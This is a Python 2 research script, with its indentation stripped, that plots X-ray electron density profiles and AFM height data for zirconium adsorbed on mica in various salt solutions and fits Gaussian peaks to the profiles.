dump_files_genx_4=['temp_plot_eden_100LiCl_Oct5_2017','temp_plot_eden_100NaCl_Oct5_2017','temp_plot_eden_100NH4Cl_Zr_Oct10_2017','temp_plot_eden_100KCl_Zr_Oct10_2017','temp_plot_eden_100RbCl_Zr_Oct5_2017','temp_plot_eden_100RbCl_Rb_Oct10_2017','temp_plot_eden_100CsCl_Oct5_2017']
labels_genx_4=[r'100 mM LiCl [4.40(1) Zr/AUC]',r'100 mM NaCl [3.98(0.68) Zr/AUC]',r'100 mM NH4Cl [3.0(0.8) Zr/AUC]',r'100 mM KCl [3.6(0.1) Zr/AUC]',r'100 mM RbCl [2.23(0.04) Zr/AUC]',r'100 mM RbCl [0.66(0.01) Rb/AUC]',r'100 mM CsCl [1.56(0.04) Zr/AUC]']
def plot_multiple_e_profiles_2(file_head=module_path_locator(),dump_files=dump_files_genx_4,label_marks=labels_genx_4,color_type=1):
def _cal_percentage_(data,cutoff=5,label=''):#use to calculate the percentage of resonant element area within the cutoff distance from mineral surface
z,e=data[0],data[1]
total_area=0
target_area=0
for i in range(len(z))[1:]:
x1,y1=z[i],e[i]
x0,y0=z[i-1],e[i-1]
area=abs(x1-x0)*min([y0,y1])+abs(x1-x0)*abs(y1-y0)/2
total_area+=area
if x1<=cutoff:
target_area+=area
print '<<Case of '+label+'>>'
print 'The percentage of area plot within '+str(cutoff)+' A is:'+str(target_area/total_area*100)+'%'
return None
colors=set_color(len(dump_files),color_type)
fig=pyplot.figure(figsize=(5,9))
ax1=fig.add_subplot(1,1,1)
hfont = {'fontname':['times new roman','Helvetica'][0]}
pyplot.ylabel(r"$\rm{Normalized\ Electron\ Density}$",fontsize=12,**hfont)
pyplot.xlabel(r"$\rm{Height\ from\ the\ Surface(\AA)}$",fontsize=12,**hfont)
#pyplot.title('Total e profile',fontsize=12)
#ax2=fig.add_subplot(2,1,2)
#pyplot.ylabel("E_density",fontsize=12)
#pyplot.xlabel("Z(Angstrom)",fontsize=12)
#pyplot.title('Zr e profile',fontsize=12)
for i in range(len(dump_files)):
data_eden=pickle.load(open(os.path.join(file_head,dump_files[i]),"rb"))
edata,labels=data_eden[0],data_eden[1]
ax1.plot(np.array(edata[-1][0,:]),edata[-1][1,:]+i*5,color=colors[i],label=label_marks[i],lw=2)
ax1.fill_between(np.array(edata[-1][0,:]),edata[-1][2,:]*0+i*5,edata[-1][2,:]+i*5,color=colors[i],alpha=0.6)
ax1.annotate(label_marks[i],xy=(18,edata[-1][1,:][-1]+i*5-0.5),xytext=(18,edata[-1][1,:][-1]+i*5-0.5),fontsize=10,**hfont)
_cal_percentage_([edata[-1][0,:],edata[-1][2,:]],label=label_marks[i])
#ax1.legend(fontsize=12)
#ax2.legend(fontsize=12)
ax1.set_ylim(0,38)
ax1.set_xlim(-5,50)
ax1.plot([2.5,2.5],[0,40],':',color='black')
ax1.plot([5,5],[0,40],':',color='black')
#ax1.plot([4.3,4.3],[0,12],':',color='black')
for label in ax1.get_xticklabels() :
label.set_fontproperties(hfont['fontname'])
label.set_fontsize(12)
for label in ax1.get_yticklabels() :
label.set_fontproperties(hfont['fontname'])
label.set_fontsize(12)
fig.tight_layout()
fig.savefig(os.path.join(file_head,'multiple_eprofiles_genx_results.png'),dpi=300)
return fig
dump_file_1=[['total_e_profile_0mM_NaCl','mica_zr_0mM_NaCl_MD_May04_rho'],['total_e_profile_1mM_NaCl','mica_zr_1mM_NaCl_MD_May04_rho'],['total_e_profile_10mM_NaCl','mica_zr_10mM_NaCl_MD_May04_rho'],['total_e_profile_100mM_NaCl','mica_zr_100mM_NaCl_MD_May04_rho']]
label_1=['0 mM NaCl','1 mM NaCl','10 mM NaCl','100 mM NaCl']
dump_file_2=[['total_e_profile_100mM_LiCl','mica_zr_100mM_LiCl_MD_Jun12_rho'],['total_e_profile_100mM_NaCl','mica_zr_100mM_NaCl_MD_May04_rho'],['total_e_profile_100mM_RbCl_Jun29','Zr_mica_zr_100mM_RbCl_MD_Jun29_rho'],['total_e_profile_100mM_RbCl_Jun29','mica_Rb_100mM_RbCl_MD_Jun29_rho'],['total_e_profile_32mM_CaCl2_APS_Jun29','mica_zr_32mM_CaCl2_MD_Jun29_rho_APS'],['total_e_profile_32mM_MgCl2_ESRF','mica_zr_32mM_MgCl2_MD_Jun29_rho_ESRF'],['total_e_profile_100mM_NH4Cl','mica_zr_100mM_NH4Cl_MD_Jun27_rho']]
label_2=['100 mM LiCl (3.4 Zr/AUC)','100 mM NaCl (3.4 Zr/AUC)','100 mM RbCl(3.2 Zr/AUC)','100 mM RbCl(2.4 Rb/AUC)','32 mM CaCl2 (5.1 Zr/AUC)','32 mM MgCl2 (3.7 Zr/AUC)','100 mM NH4Cl (2.4 Zr/AUC)']
dump_file_Jul11=[['total_e_profile_100mM_NH4Cl_Jul11','mica_zr_100mM_NH4Cl_MD_Jul11_rho'],['total_e_profile_100mM_LiCl_Jul11','mica_zr_100mM_LiCl_MD_Jul11_rho'],['total_e_profile_100mM_NaCl_Jul11','mica_zr_100mM_NaCl_MD_Jul11_rho'],['total_e_profile_100mM_KCl_Aug10','mica_zr_100mM_KCl_MD_Aug10_rho'],['total_e_profile_100mM_RbCl_Jun29','Zr_mica_zr_100mM_RbCl_MD_Jun29_rho'],['total_e_profile_100mM_CsCl_Aug10','mica_zr_100mM_CsCl_MD_Aug10_rho'],['total_e_profile_32mM_MgCl2_ESRF_Jul11','mica_zr_32mM_MgCl2_MD_Jul11_rho_ESRF'],['total_e_profile_32mM_CaCl2_APS_Jul11','mica_zr_32mM_CaCl2_MD_Jul11_rho_APS']]
label_Jul11=['100 mM NH4Cl (1.6 Zr/AUC)','100 mM LiCl (2.3 Zr/AUC)','100 mM NaCl (3.4 Zr/AUC)','100 mM KCl (3.3 Zr/AUC)','100 mM RbCl(3.2 Zr/AUC)','100 mM CsCl(3.4 Zr/AUC)','32 mM MgCl2 (3.6 Zr/AUC)','32 mM CaCl2 (5.4 Zr/AUC)',]
def plot_multiple_e_profiles_matlab_output(file_head=module_path_locator(),dump_files=dump_file_Jul11,label_marks=label_Jul11,color_type=1):
colors=set_color(len(dump_files),color_type)
fig=pyplot.figure(figsize=(4,8))
ax1=fig.add_subplot(1,1,1)
hfont = {'fontname':['times new roman','Helvetica'][0]}
pyplot.ylabel(r"$\rm{Normalized\ Electron\ Density}$",fontsize=12,**hfont)
pyplot.xlabel(r"$\rm{Height\ from\ the\ Surface(\AA)}$",fontsize=12,**hfont)
#pyplot.title('Total e profile',fontsize=12)
#ax2=fig.add_subplot(2,1,2)
#pyplot.ylabel("E_density",fontsize=12)
#pyplot.xlabel("Z(Angstrom)",fontsize=12)
#pyplot.title('Zr e profile',fontsize=12)
for i in range(len(dump_files)):
edata=np.loadtxt(os.path.join(file_head,dump_files[i][0]))
ra_data=np.loadtxt(os.path.join(file_head,dump_files[i][1]))
#labels=data_eden[0],data_eden[1]
ax1.plot(np.array(edata[:,0]),edata[:,1]+i*5,color=colors[i],label=label_marks[i],lw=2)
ax1.fill_between(ra_data[:,0],np.array([0]*len(ra_data))+i*5,ra_data[:,1]+i*5,color=colors[i],alpha=0.6)
ax1.annotate(label_marks[i],xy=(17,edata[:,1][-1]+i*5+1.5),xytext=(16,edata[:,1][-1]+i*5+1.5),fontsize=10,**hfont)
#ax1.legend(fontsize=10)
#ax2.legend(fontsize=12)
ax1.set_ylim(0,47)
ax1.set_xlim(-5,50)
ax1.plot([2.5,2.5],[0,42],':',color='black')
for label in ax1.get_xticklabels() :
label.set_fontproperties(hfont['fontname'])
label.set_fontsize(12)
for label in ax1.get_yticklabels() :
label.set_fontproperties(hfont['fontname'])
label.set_fontsize(12)
#ax1.plot([4.3,4.3],[0,20],':',color='black')
fig.tight_layout()
fig.savefig(os.path.join(file_head,'multiple_eprofiles3.png'),dpi=300)
return fig
files_AFM=['P:\\My stuff\\Data\\AFM zr on mica 001 various conditions\\Zr-mica of 0mM NaCl\\processed images\\height_dist_data',\
'P:\\My stuff\\Data\\AFM zr on mica 001 various conditions\\Zr-mica of 1mM NaCl\\processed ones\\height_dist_data',\
'P:\\My stuff\\Data\\AFM zr on mica 001 various conditions\\Zr-mica of 10mM NaCl\\processed ones\\height_dist_data',\
'P:\\My stuff\\Data\\AFM zr on mica 001 various conditions\\Zr-mica of 100mM NaCl\\processed ones\\height_dist_data']
def plot_AFM_height_distribution(files=files_AFM,labels=['0 mM NaCl','1 mM NaCl', '10 mM NaCl', '100 mM NaCl'],zero_height_offset=2.8,color_type=1):
colors=set_color(len(files),color_type)
fig=pyplot.figure(figsize=(5,2))
ax1=fig.add_subplot(1,1,1)
hfont = {'fontname':['times new roman','Helvetica'][0]}
pyplot.ylabel(r"$\rm{Distribution}$",fontsize=10,**hfont)
pyplot.xlabel(r"$\rm{Height (\AA)}$",fontsize=10,**hfont)
for i in range(len(files)):
data1=np.loadtxt(files[i],skiprows=3)
if i!=2:
data1[:,0]=data1[:,0]*1e10-zero_height_offset
else:
data1[:,0]=data1[:,0]*1e10
data1[:,1]=data1[:,1]/num.max(data1[:,1])
ax1.plot(data1[:,0],data1[:,1],color=colors[i],label=labels[i])
for label in ax1.get_xticklabels() :
label.set_fontproperties(hfont['fontname'])
label.set_fontsize(10)
for label in ax1.get_yticklabels() :
label.set_fontproperties(hfont['fontname'])
label.set_fontsize(10)
l=pyplot.legend(fontsize=10)
pyplot.setp(l.texts,family='times new roman')
fig.tight_layout()
fig.savefig(os.path.join(module_path_locator(),'AFM_height_distribution.png'),dpi=300)
return fig
files_AFM=['P:\\My stuff\\Data\\AFM zr on mica 001 various conditions\\Zr-mica of 0mM NaCl\\processed images\\facet_profile',\
'P:\\My stuff\\Data\\AFM zr on mica 001 various conditions\\Zr-mica of 1mM NaCl\\processed ones\\waviness_profile',\
'P:\\My stuff\\Data\\AFM zr on mica 001 various conditions\\Zr-mica of 10mM NaCl\\processed ones\\facet_profile',\
'P:\\My stuff\\Data\\AFM zr on mica 001 various conditions\\Zr-mica of 100mM NaCl\\processed ones\\facet_profile']
def plot_AFM_facet_profiles(files=files_AFM,labels=[r"$\rm{0\ mM\ NaCl\ (Avg=5.4 \pm 0.5\ nm)}$",r"$\rm{1\ mM\ NaCl\ (Avg=5.1 \pm 0.1\ nm)}$", r"$\rm{10\ mM\ NaCl\ (Avg=7.3 \pm 0.6\ nm)}$", r"$\rm{100\ mM\ NaCl\ (Avg=8.6 \pm 0.5\ nm)}$"],color_type=1):
colors=set_color(len(files),color_type)
fig=pyplot.figure(figsize=(5,8))
hfont = {'fontname':['times new roman','Helvetica'][0]}
for i in range(len(files)):
ax1=fig.add_subplot(4,1,4-i)
data1=np.loadtxt(files[i],skiprows=3)
data1[:,0]=data1[:,0]*1e9
data1[:,1]=data1[:,1]*1e9
ax1.plot(data1[:,0],data1[:,1],color=colors[i])
l=pyplot.title(labels[i],fontsize=12)
#pyplot.setp(l.texts,family='times new roman')
pyplot.ylabel(r"$\rm{Height (nm)}$",fontsize=12,**hfont)
if i==0:
pyplot.xlabel(r"$\rm{Length (nm)}$",fontsize=12,**hfont)
fig.tight_layout()
fig.savefig(os.path.join(module_path_locator(),'AFM_facet_profiles.png'),dpi=300)
return fig
def plot_multiple_APQ_profiles(file_head=module_path_locator(),dump_files=['temp_plot_raxr_A_P_Q_0NaCl','temp_plot_raxr_A_P_Q_1NaCl','temp_plot_raxr_A_P_Q_10NaCl','temp_plot_raxr_A_P_Q_100NaCl'],labels=['free of NaCl','1 mM NaCl','10 mM NaCl','100 mM NaCl'],color_type=5):
colors=set_color(len(dump_files),color_type)
fig1=pyplot.figure(figsize=(8,4))
ax1=fig1.add_subplot(1,2,1)
pyplot.ylabel(r'$\rm{Partial\ SF\ Amplitude\ (Zr/A_{UC})}$')
pyplot.xlabel(r'$\rm{q\ (\AA^{-1})}$')
ax2=fig1.add_subplot(1,2,2)
pyplot.ylabel(r'$\rm{Partial\ SF\ Phase/q\ (\AA)}$')
pyplot.xlabel(r'$\rm{q\ (\AA^{-1})}$')
for i in range(len(dump_files)):
AP_Q_file=os.path.join(file_head,dump_files[i])
#plot Q dependence of Foriour components A and P
data_AP_Q=pickle.load(open(AP_Q_file,"rb"))
#A over Q
ax1.plot(data_AP_Q[0][2],data_AP_Q[0][0],color=colors[i],label=labels[i],lw=1.5)
ax1.errorbar(data_AP_Q[1][2],data_AP_Q[1][0],yerr=np.transpose(data_AP_Q[1][3]),color=colors[i],fmt='o',markersize=4.5)
#P over Q
ax2.plot(data_AP_Q[0][2],np.array(data_AP_Q[0][1])/np.array(data_AP_Q[0][2])*np.pi*2,color=colors[i],label=labels[i],lw=1.5)
ax2.errorbar(data_AP_Q[1][2],np.array(data_AP_Q[1][1])/np.array(data_AP_Q[1][2])*np.pi*2,yerr=np.transpose(data_AP_Q[1][4])*np.pi*2/[data_AP_Q[1][2],data_AP_Q[1][2]],color=colors[i],fmt='o',markersize=4.5)
ax2.legend(frameon=False,fontsize=12)
ax1.legend(frameon=False,fontsize=12)
ax1.set_xlim(0,4)
ax2.set_xlim(0,4)
fig1.tight_layout()
fig1.savefig(os.path.join(file_head,'multiple_APQ_profiles.png'),dpi=300)
return fig1
def plot_AFM_profiles(file_head='P:\\My stuff\\Manuscripts\\zr on mica\\AFM images',profile_files=['AFM profile for 0mM NaCl.csv','AFM profile for 1mM NaCl.csv','AFM profile for 10mM NaCl.csv','AFM profile for 100mM NaCl.csv'],labels=['0mM NaCl','1mM NaCl','10mM NaCl','100mM NaCl'],color_type=5):
colors=set_color(len(profile_files),color_type)
fig=pyplot.figure(figsize=(6,6))
for i in range(len(profile_files)):
data=np.loadtxt(os.path.join(file_head,profile_files[i]),delimiter=',')
ax=fig.add_subplot(2,2,i+1)
ax.plot(data[:,1],data[:,0])
pyplot.title(labels[i],fontsize=10)
pyplot.xlabel("length (nm)")
pyplot.ylabel("height (nm)")
fig.tight_layout()
fig.savefig(os.path.join(file_head,'AFM_profiles.png'),dpi=300)
return fig
def cal_e_density(z_list,oc_list,u_list,z_min=0,z_max=29,resolution=1000,N=40,wt=0.25,Auc=46.927488088,water_scaling=1):
height_list=[]
e_list=[]
z_min=float(z_min)
z_max=float(z_max)
def _density_at_z(z,z_cen,oc,u):
return wt*N*oc*(2*np.pi*u**2)**-0.5*np.exp(-0.5/u**2*(z-z_cen)**2)/Auc
for i in range(resolution):
z_each=z_min+(z_max-z_min)/resolution*i
e_temp=0
for j in range(len(z_list)):
z_cen=z_list[j]
oc=oc_list[j]
u=u_list[j]
e_temp+=_density_at_z(z_each,z_cen,oc,u)
height_list.append(z_each)
e_list.append(e_temp/water_scaling)
pickle.dump([height_list,e_list],open(os.path.join(module_path_locator(),"temp_plot_RAXR_eden_e_fit"),"wb"))
pyplot.figure()
pyplot.plot(height_list,e_list)
return e_list
def fit_e_2(zs=None,water_scaling=1,fit_range=[1,40]):
total_eden=pickle.load(open(os.path.join(module_path_locator(),"temp_plot_eden"),"rb"))[0][-1]
raxr_eden=pickle.load(open(os.path.join(module_path_locator(),"temp_plot_RAXR_eden_e_fit"),"rb"))
pyplot.figure()
pyplot.plot(raxr_eden[0],raxr_eden[1])
fit_data=np.append(np.array(raxr_eden[0])[:,np.newaxis],(np.array(total_eden[1,:])-np.array(raxr_eden[1]))[:,np.newaxis],axis=1)
pyplot.figure()
print '##############Total e - raxr - water#################'
gaussian_fit(fit_data,fit_range=fit_range,zs=zs,water_scaling=water_scaling)
pyplot.title('Total e - raxr -water')
return None
def overplot_total_raxr_e_density():
total_eden=pickle.load(open(os.path.join(module_path_locator(),"temp_plot_eden"),"rb"))[0][-1]
raxr_eden=pickle.load(open(os.path.join(module_path_locator(),"temp_plot_RAXR_eden_e_fit"),"rb"))
pyplot.figure()
pyplot.plot(raxr_eden[0],raxr_eden[1],label='RAXR el e density')
pyplot.plot(total_eden[0,:],total_eden[1,:],label='Total e density')
pyplot.legend()
return None
def overplot_raxr_e_density(dump_files=["temp_plot_RAXR_eden_e_fit_0mMNaCl","temp_plot_RAXR_eden_e_fit_1mMNaCl","temp_plot_RAXR_eden_e_fit_10mMNaCl","temp_plot_RAXR_eden_e_fit_100mMNaCl"],labels=['0mM NaCl','1mM NaCl','10mM NaCl','100mM NaCl']):
fig=pyplot.figure()
colors=set_color(len(dump_files),1)
for i in range(len(dump_files)):
dump_file=dump_files[i]
label=labels[i]
raxr_eden=pickle.load(open(os.path.join(module_path_locator(),dump_file),"rb"))
pyplot.fill_between(raxr_eden[0],np.array(raxr_eden[1])+i,i,color=colors[i],label=label)
pyplot.legend()
#fig.savefig(os.path.join(os.path.join(module_path_locator(),'temp_raxr_e_profiles_overlapping_profile.png'),dpi=300))
return fig
def plot_all(path=module_path_locator(),make_offset_of_total_e=False,fit_e_profile=0):
#set make_offset_of_total_e to True if you want to have total e density replesented by total_e - resonant e in the case when the resonant els are freezed to have no influence on the CTR.
#At the same time, the total_e - raxs_e - water is actually total_e - 2*raxs_e -water
PATH=path
#which plots do you want to create
plot_e_model,plot_e_FS,plot_ctr,plot_raxr,plot_AP_Q=1,1,0,0,0
#specify file paths (files are dumped files when setting running_mode=False in GenX script)
e_file=os.path.join(PATH,"temp_plot_eden")#e density from model
e_file_FS=os.path.join(PATH,"temp_plot_eden_fourier_synthesis") #e density from Fourier synthesis
water_scaling_file=os.path.join(PATH,"water_scaling")
ctr_file_folder=PATH
ctr_file_names=["temp_plot"]#you may want to overplot differnt ctr profiles based on differnt models
raxr_file=os.path.join(PATH,"temp_plot_raxr")
AP_Q_file=os.path.join(PATH,"temp_plot_raxr_A_P_Q")
e_den_subtracted=None
e_den_raxr_MI=None
water_scaling=None
#plot electron density profile
if plot_e_model:
data_eden=pickle.load(open(e_file,"rb"))
edata,labels=data_eden[0],data_eden[1]
water_scaling=pickle.load(open(water_scaling_file,"rb"))[-1]#total water scaling factor to be used in Gaussian fit below
N=len(labels)
fig=pyplot.figure(figsize=(15,6))
if plot_e_FS:
data_eden_FS=pickle.load(open(e_file_FS,"rb"))
data_eden_FS_sub=pickle.load(open(e_file_FS+"_sub","rb"))
for i in range(N):
if i==N-1:
ax=fig.add_subplot(1,2,2)
else:
#ax=fig.add_subplot(N/2+1,2,i*2+1)
ax=fig.add_subplot(N-1,2,i*2+1)
if make_offset_of_total_e:
try:
edata[i][1,:]=list(np.array(edata[i][1,:])-np.array(edata[i][2,:]))
except:
pass
else:
pass
ax.plot(np.array(edata[i][0,:]),edata[i][1,:],color='black',lw=2.5,linestyle='-',label="Total e density")
ax.plot([0,0],[0,max(edata[i][1,:])+2],linestyle=':',color='m',lw=3,label='Mineral surface')
#ax.plot(np.array(edata[i][0,:]),edata[i][2,:],color='blue')
ax.fill_between(np.array(edata[i][0,:]),edata[i][2,:],alpha=0.2,color='m',label="RAXS element e profile (MD)")
#try:#some domain may have no raxr element
# ax.plot(np.array(edata[i][0,:]),edata[i][2,:],color='g',label="RAXS element e profile (MD)")
#except:
# pass
pyplot.title(labels[i],fontsize=11)
if plot_e_FS:
#if i==0:
if i!=N-1:
ax.plot(data_eden_FS[0],list(np.array(data_eden_FS[2])[:,i]),color='r',label="RAXR imaging (MI)")
#ax.fill_between(data_eden_FS[0],list(np.array(data_eden_FS[2])[:,i]),color='m',alpha=0.6)
#clip off negative part of the e density through Fourier thynthesis
#ax.fill_between(data_eden_FS[0],list(edata[i][1,:]-edata[i][3,:]-np.array(data_eden_FS[2])[:,i]*(np.array(data_eden_FS[2])[:,i]>0.01)),color='black',alpha=0.6,label="Total e - LayerWater - RAXR")
ax.fill_between(data_eden_FS[0],edata[i][3,:],color='green',alpha=0.4,label="LayerWater")
ax.plot(data_eden_FS_sub[0],list(np.array(data_eden_FS_sub[2])[:,i]),color='blue',label="RAXR imaging (MD)")
#ax.fill_between(data_eden_FS_sub[0],list(np.array(data_eden_FS_sub[2])[:,i]),color='c',alpha=0.6)
elif i==N-1:
ax.plot(data_eden_FS[0],data_eden_FS[1],color='r',label="RAXR imaging (MI)")
#ax.fill_between(data_eden_FS[0],data_eden_FS[1],color='m',alpha=0.6)
#ax.fill_between(data_eden_FS[0],edata[i][1,:]-data_eden_FS[1],color='black',alpha=0.6,label="Total e - RAXR(MI)")
ax.fill_between(data_eden_FS[0],edata[i][3,:],color='green',alpha=0.4,label="LayerWater")
'''
if make_offset_of_total_e:
ax.fill_between(data_eden_FS[0],list(edata[i][1,:]-edata[i][3,:]-2*edata[i][2,:]),color='black',alpha=0.6,label="Total e - raxr (MD) - LayerWater")
else:
ax.fill_between(data_eden_FS[0],list(edata[i][1,:]-edata[i][3,:]-edata[i][2,:]),color='black',alpha=0.6,label="Total e - raxr (MD) - LayerWater")
#ax.fill_between(data_eden_FS[0],list(edata[i][1,:]-edata[i][3,:]-np.array(data_eden_FS[1])*(np.array(data_eden_FS[1])>0.01)),color='black',alpha=0.6,label="Total e - LayerWater - RAXR")
#eden_temp=list(edata[i][1,:]-edata[i][3,:]-np.array(data_eden_FS[1])*(np.array(data_eden_FS[1])>0.01))
'''
eden_temp=None
if make_offset_of_total_e:
eden_temp=list(edata[i][1,:]-edata[i][3,:]-2*edata[i][2,:]*0)
else:
eden_temp=list(edata[i][1,:]-edata[i][3,:]-edata[i][2,:]*0)
eden_temp=(np.array(eden_temp)*(np.array(eden_temp)>0.01))[:,np.newaxis]
z_temp=np.array(data_eden_FS[0])[:,np.newaxis]
e_den_subtracted=np.append(z_temp,eden_temp,axis=1)
e_den_raxr_MI=np.append(np.array(data_eden_FS[0])[:,np.newaxis],(np.array(data_eden_FS[1])*(np.array(data_eden_FS[1])>0.01))[:,np.newaxis],axis=1)
ax.plot(data_eden_FS_sub[0],data_eden_FS_sub[1],color='blue',label="RAXR imaging (MD)")
#ax.fill_between(data_eden_FS_sub[0],data_eden_FS_sub[1],color='m',alpha=0.6)
if i==N-1:pyplot.xlabel('Z(Angstrom)',axes=ax,fontsize=12)
pyplot.ylabel('E_density',axes=ax,fontsize=12)
pyplot.ylim(ymin=0)
pyplot.xlim(xmin=-15)
pyplot.xlim(xmax=15)
if i==N-1:pyplot.legend(fontsize=11,ncol=1)
fig.tight_layout()
fig.savefig(e_file+".png",dpi=300)
if plot_ctr:
#plot ctr profiles
#plotting_single_rod(save_file=ctr_file_folder+"temp_plot_ctr.png",head=ctr_file_folder,object_files=ctr_file_names,color=['w','r'],l_dashes=[(None,None)],lw=2,rod_index=0)
plotting_many_modelB(save_file=os.path.join(ctr_file_folder,"temp_plot_ctr.png"),head=ctr_file_folder,object_files=ctr_file_names,color=['b','r'],l_dashes=[(None,None)],lw=2)
plt.show(block=False)
if plot_raxr:
#plot raxr profiles
data_raxr=pickle.load(open(raxr_file,"rb"))
plotting_raxr_new(data_raxr,savefile=raxr_file+".png",color=['b','r'],marker=['o'])
plt.show(block=False)
if plot_AP_Q:
#plot Q dependence of Foriour components A and P
colors=['black','r','blue','green','yellow']
labels=['Domain1','Domain2','Domain3','Domain4']
data_AP_Q=pickle.load(open(AP_Q_file,"rb"))
fig1=pyplot.figure(figsize=(9,9))
ax1=fig1.add_subplot(2,1,1)
#A over Q
ax1.plot(data_AP_Q[0][2],data_AP_Q[0][0],color='r')
ax1.errorbar(data_AP_Q[1][2],data_AP_Q[1][0],yerr=np.transpose(data_AP_Q[1][3]),color='g',fmt='o')
pyplot.ylabel("A",axes=ax1)
pyplot.xlabel("Q",axes=ax1)
pyplot.legend()
#P over Q
ax2=fig1.add_subplot(2,1,2)
ax2.plot(data_AP_Q[0][2],np.array(data_AP_Q[0][1])/np.array(data_AP_Q[0][2])*np.pi*2,color='r')
ax2.errorbar(data_AP_Q[1][2],np.array(data_AP_Q[1][1])/np.array(data_AP_Q[1][2])*np.pi*2,yerr=np.transpose(data_AP_Q[1][4])*np.pi*2/[data_AP_Q[1][2],data_AP_Q[1][2]],color='g',fmt='o')
pyplot.ylabel("P/Q(2pi)",axes=ax2)
pyplot.xlabel("Q",axes=ax2)
pyplot.legend()
fig1.savefig(os.path.join(PATH,'temp_APQ_profile.png'),dpi=300)
#now plot the subtracted e density and print out the gaussian fit results
if fit_e_profile:
pyplot.figure()
print '##############Total e -layer water#################'
#gaussian_fit(e_den_subtracted,zs=None,water_scaling=water_scaling)
gaussian_fit_DE(e_den_subtracted,zs=3,water_scaling=water_scaling)
pyplot.title('Total e - layer water')
pyplot.figure()
print '#########################RAXR (MI)########################'
gaussian_fit(e_den_raxr_MI,zs=None,N=40,water_scaling=water_scaling)
pyplot.title('RAXR (MI)')
pyplot.figure()
'''
print '#########################RAXR (MD)########################'
gaussian_fit(np.append([data_eden_FS_sub[0]],[data_eden_FS_sub[1]*(np.array(data_eden_FS_sub[1])>0)],axis=0).transpose(),zs=None,N=40,water_scaling=water_scaling)
pyplot.title('RAXR (MD)')
pyplot.show()
#return e_den_subtracted,data_eden_FS
'''
return water_scaling
def gaussian_fit_DE(data,fit_range=[1,40],zs=None,N=8,water_scaling=1):
x,y=[],[]
for i in range(len(data)):
if data[i,0]>fit_range[0] and data[i,0]<fit_range[1]:
x.append(data[i,0]),y.append(data[i,1])
x,y=np.array(x),np.array(y)*water_scaling
plt.plot(x,y)
plt.show()
def func_DE(params,*args):
x=np.array(list(args))
y_fit = np.zeros_like(x)
for i in range(0, len(params), 3):
amp = abs(params[i])
wid = abs(params[i+1])
ctr= abs(params[i+2])
y_fit = y_fit + amp * np.exp( -((x - ctr)/wid)**2/2)
return sum(abs(y_fit-y))
def func(params,*args):
x=np.array(list(args))
y_fit = np.zeros_like(x)
for i in range(0, len(params), 3):
amp = abs(params[i])
wid = abs(params[i+1])
ctr= abs(params[i+2])
y_fit = y_fit + amp * np.exp( -((x - ctr)/wid)**2/2)
return y_fit
ctrs=[]
bounds=[]
if zs==None:
for i in range(1,len(x)-1):
if y[i-1]<y[i] and y[i+1]<y[i]:
ctrs.append(x[i])
elif type(zs)==int:
ctrs=[fit_range[0]+(fit_range[1]-fit_range[0])/zs*i for i in range(zs)]+[fit_range[1]]
else:
ctrs=np.array(zs)
for i in range(len(ctrs)):
#bounds+=[(0,30),(0.2,10),(np.max([ctrs[i]-5,fit_range[0]]),np.min([ctrs[i]+5,fit_range[1]]))]
bounds+=[(0,30),(0.2,10),(fit_range[0],fit_range[1])]
result=differential_evolution(func_DE, bounds,args=tuple(x))
popt=result.x
print popt
combinded_set=[]
#print 'z occupancy*4 U(sigma**2)'
for i in range(0,len(popt),3):
combinded_set=combinded_set+[abs(popt[i])/N*(abs(popt[i])*np.sqrt(np.pi*2)*5.199*9.027)*4,abs(popt[i+1])**2,popt[i+2]]
#print '%3.3f\t%3.3f\t%3.3f'%(ctrs[i/2],abs(popt[i])/N*(abs(popt[i+1])*np.sqrt(np.pi*2)*5.199*9.027)*4,abs(popt[i+1])**2)
combinded_set=np.reshape(np.array(combinded_set),(len(combinded_set)/3,3)).transpose()
print combinded_set
#combinded_set=combinded_set.transpose()
#normalized to full surface unit cell
print 'total_occupancy=',np.sum(combinded_set[0,:]/4)
#normalized to half unit cell (oc and u have been added to 1 to be used in Matlab input par file)
print 'OC_RAXS_LIST=np.array([',','.join([str(each) for each in combinded_set[0,:]]),'])'
#the u not U(u**2)
print 'U_RAXS_LIST=np.array([',','.join([str(each) for each in combinded_set[1,:]]),'])'
print 'X_RAXS_LIST=[0.5]*',len(combinded_set[1,:])
print 'Y_RAXS_LIST=[0.5]*',len(combinded_set[1,:])
print 'Z_RAXS_LIST=np.array([',','.join([str(each) for each in combinded_set[2,:]]),'])'
fit = func(popt,*x)
plt.plot(x, y)
plt.plot(x, fit , 'r-')
plt.show()
def gaussian_fit(data,fit_range=[1,40],zs=None,N=8,water_scaling=1):
x,y=[],[]
for i in range(len(data)):
if data[i,0]>fit_range[0] and data[i,0]<fit_range[1]:
x.append(data[i,0]),y.append(data[i,1])
x,y=np.array(x),np.array(y)*water_scaling
plt.plot(x,y)
plt.show()
def func(x_ctrs,*params):
y = np.zeros_like(x_ctrs[0])
x=x_ctrs[0]
ctrs=x_ctrs[1]
for i in range(0, len(params), 2):
amp = abs(params[i])
wid = abs(params[i+1])
ctr=ctrs[int(i/2)]
y = y + amp * np.exp( -((x - ctr)/wid)**2/2)
return y
guess = []
ctrs=[]
if zs==None:
for i in range(1,len(x)-1):
if y[i-1]<y[i] and y[i+1]<y[i]:
ctrs.append(x[i])
elif type(zs)==int:
ctrs=[fit_range[0]+(fit_range[1]-fit_range[0])/zs*i for i in range(zs)]+[fit_range[1]]
else:
ctrs=np.array(zs)
for i in range(len(ctrs)):
guess += [0.5, 1]
popt, pcov = curve_fit(func, [x,ctrs], y, p0=guess)
combinded_set=[]
#print 'z occupancy*4 U(sigma**2)'
for i in range(0,len(popt),2):
combinded_set=combinded_set+[ctrs[i/2],abs(popt[i])/N*(abs(popt[i+1])*np.sqrt(np.pi*2)*5.199*9.027)*4,abs(popt[i+1])**2]
#print '%3.3f\t%3.3f\t%3.3f'%(ctrs[i/2],abs(popt[i])/N*(abs(popt[i+1])*np.sqrt(np.pi*2)*5.199*9.027)*4,abs(popt[i+1])**2)
combinded_set=np.reshape(np.array(combinded_set),(len(combinded_set)/3,3)).transpose()
#combinded_set=combinded_set.transpose()
#normalized to full surface unit cell
#inputs for GenX refinement
print 'total_occupancy=',np.sum(combinded_set[1,:]/4)
print 'OC_LIST=np.array([',','.join([str(each) for each in combinded_set[1,:]]),'])'
print 'U_LIST=np.array([',','.join([str(each) for each in combinded_set[2,:]]),'])'
print 'X_LIST=[0.5]*',len(combinded_set[1,:])
print 'Y_LIST=[0.5]*',len(combinded_set[1,:])
print 'Z_LIST=np.array([',','.join([str(each) for each in combinded_set[0,:]]),'])'
fit = func([x,ctrs], *popt)
plt.plot(x, y)
plt.plot(x, fit , 'r-')
plt.show()
